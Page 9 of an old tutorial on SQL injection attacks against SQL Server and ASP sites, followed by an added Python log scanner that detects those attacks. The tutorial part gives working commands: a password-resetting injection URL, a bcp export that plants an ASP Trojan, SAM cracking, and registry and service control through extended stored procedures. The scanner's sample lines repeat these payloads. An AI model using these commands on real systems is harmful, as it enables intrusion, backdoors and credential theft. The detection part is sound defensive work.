Hackers teach you: SQL injection attack methods (9)
  Added: 07/16/2008   Published: 07/16/2008   Hits: 13
10 pages in total; this is page 9.


HTTP://xxx.xxx.xxx/abc.asp?p=YY; update TestDB.dbo.admin set pwd='… where username='www'; --
(Here AAABBBCCCDDDEEEF stands for the MD5 value of the password 1, so the update sets the password to 1; www is a known user name.)
The password can be set back to its original value with the same method.

2. Using the table-content export function to write files
SQL Server has the BCP command, which can export the contents of a table to a text file at a specified location. Using this function, one can first create a temporary table, insert an ASP Trojan into it line by line, and then use the BCP command to export the table as an ASP file.
The command line looks like this:
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P foobar
(The -S parameter is the server that runs the query, -U is the user and -P is the password; the end result is that a runcommand.asp Trojan has been uploaded.)

6. Obtaining system administrator privileges
An ASP Trojan only has USER privileges; to gain complete control of the system, administrator privileges are required. How is that done? There are many ways to escalate privileges:
(once the Trojan is uploaded, modify an autostart .ini file and restart, and it is done);
copy CMD.exe into the scripts directory, manually creating a UNICODE hole;
download the SAM file, crack it and obtain the passwords of all OS users;
and so on; which method to use depends on the specifics of the system.

7. Several SQL Server-specific methods
1) Using the xp_regread extended stored procedure to modify the registry
Another useful set of built-in extended stored procedures is the xp_regread family (Xp_regaddmultistring, Xp_regdeletekey, Xp_regdeletevalue, Xp_regenumkeys, Xp_regenumvalues, Xp_regread, Xp_regremovemultistring, Xp_regwrite). An attacker can use these procedures to modify the registry, for example to read SAM values, allow null-session connections, set programs to run automatically at startup, and so on. For example:
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
determines which null-session shares are available on the server.
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
shows all SNMP communities configured on the server; with this information an attacker could reconfigure network equipment on the same network.

2) Using other stored procedures to alter the server
The xp_servicecontrol procedure allows the user to start and stop services. For example:
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
Xp_availablemedia shows the drives available on the machine.
Xp_dirtree allows a directory tree to be obtained.
Xp_enumdsn enumerates the ODBC data sources on the server.
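From the defender's side, the stacked-query password update, the bcp export and the extended stored procedures listed on this page all leave recognisable traces in web-server and SQL Server query logs. The following is an added detection example (not code from the original article): it URL-decodes each captured parameter or command and flags the procedure names above, a second statement stacked after a semicolon, comment truncation and "bcp ... queryout". The log format (request id, tab, text) and all sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus
# Extended stored procedures named in this article; an ordinary web
# application's database login has no reason to call any of them.
SUSPICIOUS_PROCS = (
    "xp_regread", "xp_regwrite", "xp_regdeletekey", "xp_regdeletevalue",
    "xp_regenumkeys", "xp_regenumvalues", "xp_regaddmultistring",
    "xp_regremovemultistring", "xp_servicecontrol", "xp_availablemedia",
    "xp_dirtree", "xp_enumdsn",
)
PROC_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_PROCS) + r")\b", re.IGNORECASE)
# ';' followed by a second statement: the stacked-query shape of the UPDATE above.
STACKED_RE = re.compile(r";\s*(update|insert|delete|exec(?:ute)?)\b", re.IGNORECASE)
COMMENT_RE = re.compile(r"--|/\*")  # cuts off the rest of the original query
# "bcp ... queryout" writes a query result to a file path of the caller's choice.
BCP_RE = re.compile(r"\bbcp\b.*\bqueryout\b", re.IGNORECASE)

def analyse(text):
    """Return the findings for one request parameter or captured command."""
    decoded = unquote_plus(text)  # undo URL encoding before matching
    findings = ["extended-proc:" + m.group(1).lower() for m in PROC_RE.finditer(decoded)]
    if STACKED_RE.search(decoded):
        findings.append("stacked-query")
    if COMMENT_RE.search(decoded):
        findings.append("comment-truncation")
    if BCP_RE.search(decoded):
        findings.append("bcp-queryout")
    return findings

def scan_log(lines):
    """Map request id -> findings for every 'id<TAB>text' line that has any."""
    report = {}
    for line in lines:
        req_id, _, text = line.partition("\t")
        if hits := analyse(text):
            report[req_id] = hits
    return report

# Constructed sample lines, not real traffic; r2, r3 and r4 mirror the
# article's own examples, r1 is benign.
SAMPLE_LOG = [
    "r1\tp=YY",
    "r2\tp=YY; update TestDB.dbo.admin set pwd='x' where username='www'; --",
    "r3\tp=YY%3B%20exec%20master..xp_regenumvalues%20HKEY_LOCAL_MACHINE%2C%20'SYSTEM%5CCurrentControlSet%5CServices%5Csnmp%5Cparameters%5Cvalidcommunities'",
    "r4\tbcp \"select * from text..foo\" queryout c:\\inetpub\\wwwroot\\runcommand.asp -c",
]
if __name__ == "__main__":
    for req_id, hits in scan_log(SAMPLE_LOG).items():
        print(req_id, ", ".join(hits))
```

A hit on any of these patterns from the web application's own database login is worth an alert regardless of whether the call succeeded; the durable fix is to deny that login EXECUTE on these procedures and to pass user input only through parameterised queries.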
